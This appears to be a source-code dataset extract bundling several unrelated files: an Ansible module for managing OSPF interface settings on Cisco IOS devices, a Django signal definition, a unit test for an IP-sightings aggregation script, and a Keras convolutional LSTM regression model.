Ospf_InterfacesArgs,
)
from ansible_collections.cisco.ios.plugins.module_utils.network.ios.config.ospf_interfaces.ospf_interfaces import (
Ospf_Interfaces,
)
def main():
"""
Main entry point for module execution
:returns: the result form module invocation
"""
required_if = [
("state", "merged", ("config",)),
("state", "replaced", ("config",)),
("state", "overridden", ("config",)),
("state", "rendered", ("config",)),
("state", "parsed", ("running_config",)),
]
mutually_exclusive = [("config", "running_config")]
module = AnsibleModule(
argument_spec=Ospf_InterfacesArgs.argument_spec,
required_if=required_if,
mutually_exclusive=mutually_exclusive,
supports_check_mode=True,
)
result = Ospf_Interfaces(module).execute_module()
module.exit_json(**result)
if __name__ == "__main__":
main()
| 31.5 | 116 | 0.539913 | #!/usr/bin/python
#
# -*- coding: utf-8 -*-
# Copyright 2020 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#############################################
# WARNING #
#############################################
#
# This file is auto generated by the resource
# module builder playbook.
#
# Do not edit this file manually.
#
# Changes to this file will be over written
# by the resource module builder.
#
# Changes should be made in the model used to
# generate this file or in the resource module
# builder template.
#
#############################################
"""
The module file for ios_ospf_interfaces
"""
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = """
module: ios_ospf_interfaces
short_description: OSPF_Interfaces resource module
description: This module configures and manages the Open Shortest Path First (OSPF)
version 2 on IOS platforms.
version_added: 1.0.0
author: Sumit Jaiswal (@justjais)
notes:
- Tested against Cisco IOSv Version 15.2 on VIRL.
- This module works with connection C(network_cli).
See U(https://docs.ansible.com/ansible/latest/network/user_guide/platform_ios.html)
options:
config:
description: A dictionary of OSPF interfaces options.
type: list
elements: dict
suboptions:
name:
description:
- Full name of the interface excluding any logical unit number,
i.e. GigabitEthernet0/1.
type: str
required: true
address_family:
description:
- OSPF interfaces settings on the interfaces in address-family
context.
type: list
elements: dict
suboptions:
afi:
description:
- Address Family Identifier (AFI) for OSPF interfaces settings
on the interfaces.
type: str
choices:
- ipv4
- ipv6
required: true
process:
description: OSPF interfaces process config
type: dict
suboptions:
id:
description:
- Address Family Identifier (AFI) for OSPF interfaces settings
on the interfaces. Please refer vendor documentation of Valid
values.
type: int
area_id:
description:
- OSPF interfaces area ID as a decimal value. Please
refer vendor documentation of Valid values.
- OSPF interfaces area ID in IP address format(e.g.
A.B.C.D)
type: str
secondaries:
description:
- Include or exclude secondary IP addresses.
- Valid only with IPv4 config
type: bool
instance_id:
description:
- Set the OSPF instance based on ID
- Valid only with IPv6 OSPF config
type: int
adjacency:
description: Adjacency staggering
type: bool
authentication:
description: Enable authentication
type: dict
suboptions:
key_chain:
description: Use a key-chain for cryptographic
authentication keys
type: str
message_digest:
description: Use message-digest authentication
type: bool
'null':
description: Use no authentication
type: bool
bfd:
description:
- BFD configuration commands
- Enable/Disable BFD on this interface
type: bool
cost:
description: Interface cost
type: dict
suboptions:
interface_cost:
description: Interface cost or Route cost of this interface
type: int
dynamic_cost:
description:
- Specify dynamic cost options
- Valid only with IPv6 OSPF config
type: dict
suboptions:
default:
description: Specify default link metric value
type: int
hysteresis:
description: Specify hysteresis value for LSA dampening
type: dict
suboptions:
percent:
description: Specify hysteresis percent changed.
Please refer vendor documentation of Valid values.
type: int
threshold:
description: Specify hysteresis threshold value.
Please refer vendor documentation of Valid values.
type: int
weight:
description: Specify weight to be placed on individual
metrics
type: dict
suboptions:
l2_factor:
description:
- Specify weight to be given to L2-factor metric
- Percentage weight of L2-factor metric. Please refer
vendor documentation of Valid values.
type: int
latency:
description:
- Specify weight to be given to latency metric.
- Percentage weight of latency metric. Please refer
vendor documentation of Valid values.
type: int
oc:
description:
- Specify weight to be given to cdr/mdr for oc
- Give 100 percent weightage for current data rate(0
for maxdatarate)
type: bool
resources:
description:
- Specify weight to be given to resources metric
- Percentage weight of resources metric. Please refer
vendor documentation of Valid values.
type: int
throughput:
description:
- Specify weight to be given to throughput metric
- Percentage weight of throughput metric. Please refer
vendor documentation of Valid values.
type: int
database_filter:
description: Filter OSPF LSA during synchronization and flooding
type: bool
dead_interval:
description: Interval after which a neighbor is declared dead
type: dict
suboptions:
time:
description: time in seconds
type: int
minimal:
description:
- Set to 1 second and set multiplier for Hellos
- Number of Hellos sent within 1 second. Please refer
vendor documentation of Valid values.
- Valid only with IP OSPF config
type: int
demand_circuit:
description: OSPF Demand Circuit, enable or disable
the demand circuit'
type: dict
suboptions:
enable:
description: Enable Demand Circuit
type: bool
ignore:
description: Ignore demand circuit auto-negotiation requests
type: bool
disable:
description:
- Disable demand circuit on this interface
- Valid only with IPv6 OSPF config
type: bool
flood_reduction:
description: OSPF Flood Reduction
type: bool
hello_interval:
description:
- Time between HELLO packets
- Please refer vendor documentation of Valid values.
type: int
lls:
description:
- Link-local Signaling (LLS) support
- Valid only with IP OSPF config
type: bool
manet:
description:
- Mobile Adhoc Networking options
- MANET Peering options
- Valid only with IPv6 OSPF config
type: dict
suboptions:
cost:
description: Redundant path cost improvement required to peer
type: dict
suboptions:
percent:
description: Relative incremental path cost.
Please refer vendor documentation of Valid values.
type: int
threshold:
description: Absolute incremental path cost.
Please refer vendor documentation of Valid values.
type: int
link_metrics:
description: Redundant path cost improvement required to peer
type: dict
suboptions:
set:
description: Enable link-metrics
type: bool
cost_threshold:
description: Minimum link cost threshold.
Please refer vendor documentation of Valid values.
type: int
mtu_ignore:
description: Ignores the MTU in DBD packets
type: bool
multi_area:
description:
- Set the OSPF multi-area ID
- Valid only with IP OSPF config
type: dict
suboptions:
id:
description:
- OSPF multi-area ID as a decimal value. Please refer vendor
documentation of Valid values.
- OSPF multi-area ID in IP address format(e.g. A.B.C.D)
type: int
cost:
description: Interface cost
type: int
neighbor:
description:
- OSPF neighbor link-local IPv6 address (X:X:X:X::X)
- Valid only with IPv6 OSPF config
type: dict
suboptions:
address:
description: Neighbor link-local IPv6 address
type: str
cost:
description: OSPF cost for point-to-multipoint neighbor
type: int
database_filter:
description: Filter OSPF LSA during synchronization and flooding for point-to-multipoint neighbor
type: bool
poll_interval:
description: OSPF dead-router polling interval
type: int
priority:
description: OSPF priority of non-broadcast neighbor
type: int
network:
description: Network type
type: dict
suboptions:
broadcast:
description: Specify OSPF broadcast multi-access network
type: bool
manet:
description:
- Specify MANET OSPF interface type
- Valid only with IPv6 OSPF config
type: bool
non_broadcast:
description: Specify OSPF NBMA network
type: bool
point_to_multipoint:
description: Specify OSPF point-to-multipoint network
type: bool
point_to_point:
description: Specify OSPF point-to-point network
type: bool
prefix_suppression:
description: Enable/Disable OSPF prefix suppression
type: bool
priority:
description: Router priority. Please refer vendor documentation
of Valid values.
type: int
resync_timeout:
description: Interval after which adjacency is reset if oob-resync
is not started. Please refer vendor documentation of Valid values.
type: int
retransmit_interval:
description: Time between retransmitting lost link state
advertisements. Please refer vendor documentation of Valid values.
type: int
shutdown:
description: Set OSPF protocol's state to disable under
current interface
type: bool
transmit_delay:
description: Link state transmit delay.
Please refer vendor documentation of Valid values.
type: int
ttl_security:
description:
- TTL security check
- Valid only with IPV4 OSPF config
type: dict
suboptions:
set:
description: Enable TTL Security on all interfaces
type: bool
hops:
description:
- Maximum number of IP hops allowed
- Please refer vendor documentation of Valid values.
type: int
running_config:
description:
- This option is used only with state I(parsed).
- The value of this option should be the output received from the IOS
device by executing the command B(sh running-config | section
^interface).
- The state I(parsed) reads the configuration from C(running_config)
option and transforms it into Ansible structured data as per the
resource module's argspec and the value is then returned in the
I(parsed) key within the result.
type: str
state:
description:
- The state the configuration should be left in
- The states I(rendered), I(gathered) and I(parsed) does not perform any
change on the device.
- The state I(rendered) will transform the configuration in C(config)
option to platform specific CLI commands which will be returned in the
I(rendered) key within the result. For state I(rendered) active
connection to remote host is not required.
- The state I(gathered) will fetch the running configuration from device
and transform it into structured data in the format as per the resource
module argspec and the value is returned in the I(gathered) key within
the result.
- The state I(parsed) reads the configuration from C(running_config)
option and transforms it into JSON format as per the resource module
parameters and the value is returned in the I(parsed) key within the
result. The value of C(running_config) option should be the same format
as the output of command I(show running-config | include ip route|ipv6
route) executed on device. For state I(parsed) active connection to
remote host is not required.
type: str
choices:
- merged
- replaced
- overridden
- deleted
- gathered
- rendered
- parsed
default: merged
"""
EXAMPLES = """
# Using deleted
# Before state:
# -------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ipv6 ospf 55 area 105
# ipv6 ospf priority 20
# ipv6 ospf transmit-delay 30
# ipv6 ospf adjacency stagger disable
# interface GigabitEthernet0/2
# ip ospf priority 40
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf 10 area 20
# ip ospf cost 30
- name: Delete provided OSPF Interface config
cisco.ios.ios_ospf_interfaces:
config:
- name: GigabitEthernet0/1
state: deleted
# Commands Fired:
# ---------------
#
# "commands": [
# "interface GigabitEthernet0/1",
# "no ipv6 ospf 55 area 105",
# "no ipv6 ospf adjacency stagger disable",
# "no ipv6 ospf priority 20",
# "no ipv6 ospf transmit-delay 30"
# ]
# After state:
# -------------
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# interface GigabitEthernet0/2
# ip ospf priority 40
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf 10 area 20
# ip ospf cost 30
# Using deleted without any config passed (NOTE: This will delete all OSPF Interfaces configuration from device)
# Before state:
# -------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ipv6 ospf 55 area 105
# ipv6 ospf priority 20
# ipv6 ospf transmit-delay 30
# ipv6 ospf adjacency stagger disable
# interface GigabitEthernet0/2
# ip ospf priority 40
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf 10 area 20
# ip ospf cost 30
- name: Delete all OSPF config from interfaces
cisco.ios.ios_ospf_interfaces:
state: deleted
# Commands Fired:
# ---------------
#
# "commands": [
# "interface GigabitEthernet0/2",
# "no ip ospf 10 area 20",
# "no ip ospf adjacency stagger disable",
# "no ip ospf cost 30",
# "no ip ospf priority 40",
# "no ip ospf ttl-security hops 50",
# "interface GigabitEthernet0/1",
# "no ipv6 ospf 55 area 105",
# "no ipv6 ospf adjacency stagger disable",
# "no ipv6 ospf priority 20",
# "no ipv6 ospf transmit-delay 30"
# ]
# After state:
# -------------
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# interface GigabitEthernet0/2
# Using merged
# Before state:
# -------------
#
# router-ios#sh running-config | section ^interface
# router-ios#
- name: Merge provided OSPF Interfaces configuration
cisco.ios.ios_ospf_interfaces:
config:
- name: GigabitEthernet0/1
address_family:
- afi: ipv4
process:
id: 10
area_id: 30
adjacency: true
bfd: true
cost:
interface_cost: 5
dead_interval:
time: 5
demand_circuit:
ignore: true
network:
broadcast: true
priority: 25
resync_timeout: 10
shutdown: true
ttl_security:
hops: 50
- afi: ipv6
process:
id: 35
area_id: 45
adjacency: true
database_filter: true
manet:
link_metrics:
cost_threshold: 10
priority: 55
transmit_delay: 45
state: merged
# Commands Fired:
# ---------------
#
# "commands": [
# "interface GigabitEthernet0/1",
# "ip ospf 10 area 30",
# "ip ospf adjacency stagger disable",
# "ip ospf bfd",
# "ip ospf cost 5",
# "ip ospf dead-interval 5",
# "ip ospf demand-circuit ignore",
# "ip ospf network broadcast",
# "ip ospf priority 25",
# "ip ospf resync-timeout 10",
# "ip ospf shutdown",
# "ip ospf ttl-security hops 50",
# "ipv6 ospf 35 area 45",
# "ipv6 ospf adjacency stagger disable",
# "ipv6 ospf database-filter all out",
# "ipv6 ospf manet peering link-metrics 10",
# "ipv6 ospf priority 55",
# "ipv6 ospf transmit-delay 45"
# ]
# After state:
# -------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ip ospf network broadcast
# ip ospf resync-timeout 10
# ip ospf dead-interval 5
# ip ospf priority 25
# ip ospf demand-circuit ignore
# ip ospf bfd
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf shutdown
# ip ospf 10 area 30
# ip ospf cost 5
# ipv6 ospf 35 area 45
# ipv6 ospf priority 55
# ipv6 ospf transmit-delay 45
# ipv6 ospf database-filter all out
# ipv6 ospf adjacency stagger disable
# ipv6 ospf manet peering link-metrics 10
# interface GigabitEthernet0/2
# Using overridden
# Before state:
# -------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ip ospf network broadcast
# ip ospf resync-timeout 10
# ip ospf dead-interval 5
# ip ospf priority 25
# ip ospf demand-circuit ignore
# ip ospf bfd
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf shutdown
# ip ospf 10 area 30
# ip ospf cost 5
# ipv6 ospf 35 area 45
# ipv6 ospf priority 55
# ipv6 ospf transmit-delay 45
# ipv6 ospf database-filter all out
# ipv6 ospf adjacency stagger disable
# ipv6 ospf manet peering link-metrics 10
# interface GigabitEthernet0/2
- name: Override provided OSPF Interfaces configuration
cisco.ios.ios_ospf_interfaces:
config:
- name: GigabitEthernet0/1
address_family:
- afi: ipv6
process:
id: 55
area_id: 105
adjacency: true
priority: 20
transmit_delay: 30
- name: GigabitEthernet0/2
address_family:
- afi: ipv4
process:
id: 10
area_id: 20
adjacency: true
cost:
interface_cost: 30
priority: 40
ttl_security:
hops: 50
state: overridden
# Commands Fired:
# ---------------
#
# "commands": [
# "interface GigabitEthernet0/2",
# "ip ospf 10 area 20",
# "ip ospf adjacency stagger disable",
# "ip ospf cost 30",
# "ip ospf priority 40",
# "ip ospf ttl-security hops 50",
# "interface GigabitEthernet0/1",
# "ipv6 ospf 55 area 105",
# "no ipv6 ospf database-filter all out",
# "no ipv6 ospf manet peering link-metrics 10",
# "ipv6 ospf priority 20",
# "ipv6 ospf transmit-delay 30",
# "no ip ospf 10 area 30",
# "no ip ospf adjacency stagger disable",
# "no ip ospf bfd",
# "no ip ospf cost 5",
# "no ip ospf dead-interval 5",
# "no ip ospf demand-circuit ignore",
# "no ip ospf network broadcast",
# "no ip ospf priority 25",
# "no ip ospf resync-timeout 10",
# "no ip ospf shutdown",
# "no ip ospf ttl-security hops 50"
# ]
# After state:
# -------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ipv6 ospf 55 area 105
# ipv6 ospf priority 20
# ipv6 ospf transmit-delay 30
# ipv6 ospf adjacency stagger disable
# interface GigabitEthernet0/2
# ip ospf priority 40
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf 10 area 20
# ip ospf cost 30
# Using replaced
# Before state:
# -------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ip ospf network broadcast
# ip ospf resync-timeout 10
# ip ospf dead-interval 5
# ip ospf priority 25
# ip ospf demand-circuit ignore
# ip ospf bfd
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf shutdown
# ip ospf 10 area 30
# ip ospf cost 5
# ipv6 ospf 35 area 45
# ipv6 ospf priority 55
# ipv6 ospf transmit-delay 45
# ipv6 ospf database-filter all out
# ipv6 ospf adjacency stagger disable
# ipv6 ospf manet peering link-metrics 10
# interface GigabitEthernet0/2
- name: Replaced provided OSPF Interfaces configuration
cisco.ios.ios_ospf_interfaces:
config:
- name: GigabitEthernet0/2
address_family:
- afi: ipv6
process:
id: 55
area_id: 105
adjacency: true
priority: 20
transmit_delay: 30
state: replaced
# Commands Fired:
# ---------------
# "commands": [
# "interface GigabitEthernet0/2",
# "ipv6 ospf 55 area 105",
# "ipv6 ospf adjacency stagger disable",
# "ipv6 ospf priority 20",
# "ipv6 ospf transmit-delay 30"
# ]
# After state:
# -------------
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ip ospf network broadcast
# ip ospf resync-timeout 10
# ip ospf dead-interval 5
# ip ospf priority 25
# ip ospf demand-circuit ignore
# ip ospf bfd
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf shutdown
# ip ospf 10 area 30
# ip ospf cost 5
# ipv6 ospf 35 area 45
# ipv6 ospf priority 55
# ipv6 ospf transmit-delay 45
# ipv6 ospf database-filter all out
# ipv6 ospf adjacency stagger disable
# ipv6 ospf manet peering link-metrics 10
# interface GigabitEthernet0/2
# ipv6 ospf 55 area 105
# ipv6 ospf priority 20
# ipv6 ospf transmit-delay 30
# ipv6 ospf adjacency stagger disable
# Using Gathered
# Before state:
# -------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ip ospf network broadcast
# ip ospf resync-timeout 10
# ip ospf dead-interval 5
# ip ospf priority 25
# ip ospf demand-circuit ignore
# ip ospf bfd
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf shutdown
# ip ospf 10 area 30
# ip ospf cost 5
# ipv6 ospf 35 area 45
# ipv6 ospf priority 55
# ipv6 ospf transmit-delay 45
# ipv6 ospf database-filter all out
# ipv6 ospf adjacency stagger disable
# ipv6 ospf manet peering link-metrics 10
# interface GigabitEthernet0/2
- name: Gather OSPF Interfaces provided configurations
cisco.ios.ios_ospf_interfaces:
config:
state: gathered
# Module Execution Result:
# ------------------------
#
# "gathered": [
# {
# "name": "GigabitEthernet0/2"
# },
# {
# "address_family": [
# {
# "adjacency": true,
# "afi": "ipv4",
# "bfd": true,
# "cost": {
# "interface_cost": 5
# },
# "dead_interval": {
# "time": 5
# },
# "demand_circuit": {
# "ignore": true
# },
# "network": {
# "broadcast": true
# },
# "priority": 25,
# "process": {
# "area_id": "30",
# "id": 10
# },
# "resync_timeout": 10,
# "shutdown": true,
# "ttl_security": {
# "hops": 50
# }
# },
# {
# "adjacency": true,
# "afi": "ipv6",
# "database_filter": true,
# "manet": {
# "link_metrics": {
# "cost_threshold": 10
# }
# },
# "priority": 55,
# "process": {
# "area_id": "45",
# "id": 35
# },
# "transmit_delay": 45
# }
# ],
# "name": "GigabitEthernet0/1"
# },
# {
# "name": "GigabitEthernet0/0"
# }
# ]
# After state:
# ------------
#
# router-ios#sh running-config | section ^interface
# interface GigabitEthernet0/0
# interface GigabitEthernet0/1
# ip ospf network broadcast
# ip ospf resync-timeout 10
# ip ospf dead-interval 5
# ip ospf priority 25
# ip ospf demand-circuit ignore
# ip ospf bfd
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf shutdown
# ip ospf 10 area 30
# ip ospf cost 5
# ipv6 ospf 35 area 45
# ipv6 ospf priority 55
# ipv6 ospf transmit-delay 45
# ipv6 ospf database-filter all out
# ipv6 ospf adjacency stagger disable
# ipv6 ospf manet peering link-metrics 10
# interface GigabitEthernet0/2
# Using Rendered
- name: Render the commands for provided configuration
cisco.ios.ios_ospf_interfaces:
config:
- name: GigabitEthernet0/1
address_family:
- afi: ipv4
process:
id: 10
area_id: 30
adjacency: true
bfd: true
cost:
interface_cost: 5
dead_interval:
time: 5
demand_circuit:
ignore: true
network:
broadcast: true
priority: 25
resync_timeout: 10
shutdown: true
ttl_security:
hops: 50
- afi: ipv6
process:
id: 35
area_id: 45
adjacency: true
database_filter: true
manet:
link_metrics:
cost_threshold: 10
priority: 55
transmit_delay: 45
state: rendered
# Module Execution Result:
# ------------------------
#
# "rendered": [
# "interface GigabitEthernet0/1",
# "ip ospf 10 area 30",
# "ip ospf adjacency stagger disable",
# "ip ospf bfd",
# "ip ospf cost 5",
# "ip ospf dead-interval 5",
# "ip ospf demand-circuit ignore",
# "ip ospf network broadcast",
# "ip ospf priority 25",
# "ip ospf resync-timeout 10",
# "ip ospf shutdown",
# "ip ospf ttl-security hops 50",
# "ipv6 ospf 35 area 45",
# "ipv6 ospf adjacency stagger disable",
# "ipv6 ospf database-filter all out",
# "ipv6 ospf manet peering link-metrics 10",
# "ipv6 ospf priority 55",
# "ipv6 ospf transmit-delay 45"
# ]
# Using Parsed
# File: parsed.cfg
# ----------------
#
# interface GigabitEthernet0/2
# interface GigabitEthernet0/1
# ip ospf network broadcast
# ip ospf resync-timeout 10
# ip ospf dead-interval 5
# ip ospf priority 25
# ip ospf demand-circuit ignore
# ip ospf bfd
# ip ospf adjacency stagger disable
# ip ospf ttl-security hops 50
# ip ospf shutdown
# ip ospf 10 area 30
# ip ospf cost 5
# ipv6 ospf 35 area 45
# ipv6 ospf priority 55
# ipv6 ospf transmit-delay 45
# ipv6 ospf database-filter all out
# ipv6 ospf adjacency stagger disable
# ipv6 ospf manet peering link-metrics 10
# interface GigabitEthernet0/0
- name: Parse the provided configuration with the existing running configuration
cisco.ios.ios_ospf_interfaces:
running_config: "{{ lookup('file', 'parsed.cfg') }}"
state: parsed
# Module Execution Result:
# ------------------------
#
# "parsed": [
# },
# {
# "name": "GigabitEthernet0/2"
# },
# {
# "address_family": [
# {
# "adjacency": true,
# "afi": "ipv4",
# "bfd": true,
# "cost": {
# "interface_cost": 5
# },
# "dead_interval": {
# "time": 5
# },
# "demand_circuit": {
# "ignore": true
# },
# "network": {
# "broadcast": true
# },
# "priority": 25,
# "process": {
# "area_id": "30",
# "id": 10
# },
# "resync_timeout": 10,
# "shutdown": true,
# "ttl_security": {
# "hops": 50
# }
# },
# {
# "adjacency": true,
# "afi": "ipv6",
# "database_filter": true,
# "manet": {
# "link_metrics": {
# "cost_threshold": 10
# }
# },
# "priority": 55,
# "process": {
# "area_id": "45",
# "id": 35
# },
# "transmit_delay": 45
# }
# ],
# "name": "GigabitEthernet0/1"
# },
# {
# "name": "GigabitEthernet0/0"
# }
# ]
"""
RETURN = """
before:
description: The configuration prior to the model invocation.
returned: always
sample: >
The configuration returned will always be in the same format
of the parameters above.
type: dict
after:
description: The resulting configuration model invocation.
returned: when changed
sample: >
The configuration returned will always be in the same format
of the parameters above.
type: dict
commands:
description: The set of commands pushed to the remote device.
returned: always
type: list
sample: ['interface GigabitEthernet0/1', 'ip ospf 10 area 30', 'ip ospf cost 5', 'ip ospf priority 25']
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.cisco.ios.plugins.module_utils.network.ios.argspec.ospf_interfaces.ospf_interfaces import (
Ospf_InterfacesArgs,
)
from ansible_collections.cisco.ios.plugins.module_utils.network.ios.config.ospf_interfaces.ospf_interfaces import (
Ospf_Interfaces,
)
def main():
"""
Main entry point for module execution
:returns: the result form module invocation
"""
required_if = [
("state", "merged", ("config",)),
("state", "replaced", ("config",)),
("state", "overridden", ("config",)),
("state", "rendered", ("config",)),
("state", "parsed", ("running_config",)),
]
mutually_exclusive = [("config", "running_config")]
module = AnsibleModule(
argument_spec=Ospf_InterfacesArgs.argument_spec,
required_if=required_if,
mutually_exclusive=mutually_exclusive,
supports_check_mode=True,
)
result = Ospf_Interfaces(module).execute_module()
module.exit_json(**result)
if __name__ == "__main__":
main()
| 0 | 0 | 0 |
0eae48e5f8713faeacc100a4a7e5283ac3ec081e | 99 | py | Python | accounts/signals.py | rijalanupraj/halkapan | a1b5964034a4086a890f839ba4d3d2885a54235f | [
"MIT"
] | null | null | null | accounts/signals.py | rijalanupraj/halkapan | a1b5964034a4086a890f839ba4d3d2885a54235f | [
"MIT"
] | null | null | null | accounts/signals.py | rijalanupraj/halkapan | a1b5964034a4086a890f839ba4d3d2885a54235f | [
"MIT"
] | null | null | null | from django.dispatch import Signal
user_logged_in = Signal(providing_args=['instance', 'request'])
| 33 | 63 | 0.79798 | from django.dispatch import Signal
user_logged_in = Signal(providing_args=['instance', 'request'])
| 0 | 0 | 0 |
ecbb189108b2c5bba0a3e02d2c409f2c25703ac8 | 1,111 | py | Python | Packs/ExpanseV2/Scripts/ExpanseAggregateAttributionIP/ExpanseAggregateAttributionIP_test.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
] | 799 | 2016-08-02T06:43:14.000Z | 2022-03-31T11:10:11.000Z | Packs/ExpanseV2/Scripts/ExpanseAggregateAttributionIP/ExpanseAggregateAttributionIP_test.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
] | 9,317 | 2016-08-07T19:00:51.000Z | 2022-03-31T21:56:04.000Z | Packs/ExpanseV2/Scripts/ExpanseAggregateAttributionIP/ExpanseAggregateAttributionIP_test.py | diCagri/content | c532c50b213e6dddb8ae6a378d6d09198e08fc9f | [
"MIT"
] | 1,297 | 2016-08-04T13:59:00.000Z | 2022-03-31T23:43:06.000Z | import demistomock as demisto # noqa
import ExpanseAggregateAttributionIP
INPUT = [
{"src": "1.1.1.1", "count": 2},
{"src_ip": "8.8.8.8"},
{"src": "8.8.8.8", "count": 10}
]
CURRENT = [
{"ip": "1.1.1.1", "sightings": 1, "internal": False}
]
RESULT = [
{"ip": "1.1.1.1", "sightings": 3, "internal": False},
{"ip": "8.8.8.8", "sightings": 11, "internal": True}
]
def test_aggregate_command():
"""
Given:
- previous list aggregated IPs
- new data source with IP/sightings information
- merged aggregated data with new information
- list of internal ip networks
When
- merging new sightings to existing aggregated data
Then
- data is merged
- expected output is returned
"""
result = ExpanseAggregateAttributionIP.aggregate_command({
'input': INPUT,
'current': CURRENT,
'internal_ip_networks': "192.168.0.0/16,10.0.0.0/8,8.0.0.0/8"
})
assert result.outputs_prefix == "Expanse.AttributionIP"
assert result.outputs_key_field == "ip"
assert result.outputs == RESULT
| 25.25 | 69 | 0.60216 | import demistomock as demisto # noqa
import ExpanseAggregateAttributionIP
INPUT = [
{"src": "1.1.1.1", "count": 2},
{"src_ip": "8.8.8.8"},
{"src": "8.8.8.8", "count": 10}
]
CURRENT = [
{"ip": "1.1.1.1", "sightings": 1, "internal": False}
]
RESULT = [
{"ip": "1.1.1.1", "sightings": 3, "internal": False},
{"ip": "8.8.8.8", "sightings": 11, "internal": True}
]
def test_aggregate_command():
"""
Given:
- previous list aggregated IPs
- new data source with IP/sightings information
- merged aggregated data with new information
- list of internal ip networks
When
- merging new sightings to existing aggregated data
Then
- data is merged
- expected output is returned
"""
result = ExpanseAggregateAttributionIP.aggregate_command({
'input': INPUT,
'current': CURRENT,
'internal_ip_networks': "192.168.0.0/16,10.0.0.0/8,8.0.0.0/8"
})
assert result.outputs_prefix == "Expanse.AttributionIP"
assert result.outputs_key_field == "ip"
assert result.outputs == RESULT
| 0 | 0 | 0 |
9272b186aad2acbc4661815d4cf0bc2a2b4fbddf | 2,065 | py | Python | models/regression/DeepConvLSTM_2.py | Neronjust2017/keras-project | 919e67e10b0bf518eb9cc63df68c79fe2bb71b36 | [
"Apache-2.0"
] | 2 | 2020-07-07T12:29:02.000Z | 2020-09-16T15:33:02.000Z | models/regression/DeepConvLSTM_2.py | Neronjust2017/keras-project | 919e67e10b0bf518eb9cc63df68c79fe2bb71b36 | [
"Apache-2.0"
] | 1 | 2020-10-04T12:08:27.000Z | 2020-10-05T05:05:39.000Z | models/regression/DeepConvLSTM_2.py | Neronjust2017/keras-project | 919e67e10b0bf518eb9cc63df68c79fe2bb71b36 | [
"Apache-2.0"
] | null | null | null | import tensorflow.keras as keras
import tensorflow as tf
| 31.769231 | 77 | 0.48862 | import tensorflow.keras as keras
import tensorflow as tf
class DeepConvLSTM2(keras.Model):
def __init__(self, input_dim, output_dim):
super(DeepConvLSTM2, self).__init__()
self.samples = input_dim[2]
self.channels = input_dim[0]
self.rows = 1
self.cols = input_dim[1]
self.conv1 = keras.layers.Conv2D(
input_shape=(self.channels, self.rows, self.cols),
filters=64,
kernel_size=5,
padding='same',
strides=1
)
self.conv2 = keras.layers.Conv2D(
filters=128,
kernel_size=5,
padding='same',
strides=1
)
self.conv3 = keras.layers.Conv2D(
filters=256,
kernel_size=5,
padding='same',
strides=1
)
self.conv4 = keras.layers.Conv2D(
filters=512,
kernel_size=5,
padding='same',
strides=1
)
self.relu = keras.layers.Activation('relu')
self.lstm1 = keras.layers.LSTM(128,
return_sequences = True,
dropout = 0.5,
recurrent_dropout = 0.5)
self.lstm2 = keras.layers.LSTM(128,
dropout=0.5,
recurrent_dropout=0.5)
self.dense = keras.layers.Dense(output_dim, activation='sigmoid')
def call(self, x):
#x.reshape(-1, self.channels, self.rows, self.cols)
x = tf.reshape(x,[self.samples, self.channels, self.rows, self.cols])
x = self.conv1(x)
x = self.relu(x)
x = self.conv2(x)
x = self.relu(x)
x = self.conv3(x)
x = self.relu(x)
x = self.conv4(x)
x = self.relu(x)
x = tf.reshape(x, [self.samples, self.channels, -1])
x = self.lstm1(x)
x = self.relu(x)
x = self.lstm2(x)
x = self.relu(x)
x = self.dense(x)
return x
| 1,920 | 12 | 76 |
90e37972b36a35b93996ac8f5e5e0e05f5d6e812 | 31 | py | Python | myUnittest/case_way/__init__.py | ChenJiR/MyPyUnittest | 77ecde87218a0ca7482e4d1dfebd403e2325165a | [
"MIT"
] | null | null | null | myUnittest/case_way/__init__.py | ChenJiR/MyPyUnittest | 77ecde87218a0ca7482e4d1dfebd403e2325165a | [
"MIT"
] | null | null | null | myUnittest/case_way/__init__.py | ChenJiR/MyPyUnittest | 77ecde87218a0ca7482e4d1dfebd403e2325165a | [
"MIT"
] | null | null | null | from .case_decorators import *
| 15.5 | 30 | 0.806452 | from .case_decorators import *
| 0 | 0 | 0 |
bad8917af68ec43ce71ed92928cbf6cfa3debbb5 | 10,197 | py | Python | primer_evauation.py | eastgenomics/primer_designer | 5332d82a4bf1079c985976a9b7b6a04f9573b38a | [
"MIT"
] | 1 | 2021-03-24T22:33:03.000Z | 2021-03-24T22:33:03.000Z | primer_evauation.py | eastgenomics/primer_designer | 5332d82a4bf1079c985976a9b7b6a04f9573b38a | [
"MIT"
